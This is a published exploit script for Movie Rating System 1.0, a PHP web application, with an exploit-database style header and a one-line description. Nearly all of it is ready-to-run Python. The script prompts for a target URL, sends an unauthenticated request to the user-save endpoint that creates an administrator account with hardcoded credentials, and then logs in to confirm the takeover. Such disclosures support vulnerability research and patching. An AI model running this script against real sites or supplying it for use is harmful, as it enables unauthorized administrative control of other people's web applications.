Movie Rating System version 1.0 suffers from a broken access control that allows for administrative account creation.
3f0f506be9166f5bf22132c3720e3e6e# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows
import requests
import json
url = input('Url:')
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"
Username = "tago"
Password = "tagoletta"
reqUrl = url + "classes/Users.php?f=save"
reqHeaders = {
"Accept": "*/*",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
"Origin": url}
reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n"
resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)
if resp.status_code == 200:
print("Admin account created")
reqUrl = url + "classes/Login.php?f=login"
reqHeaders = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
"Origin": url
}
reqData = {"username": ""+Username+"", "password": ""+Password+""}
resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)
data = json.loads(resp.text)
status = data["status"]
if status == "success":
print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password)
else:
print("Exploited but not loginned")
else:
print("Not injectable")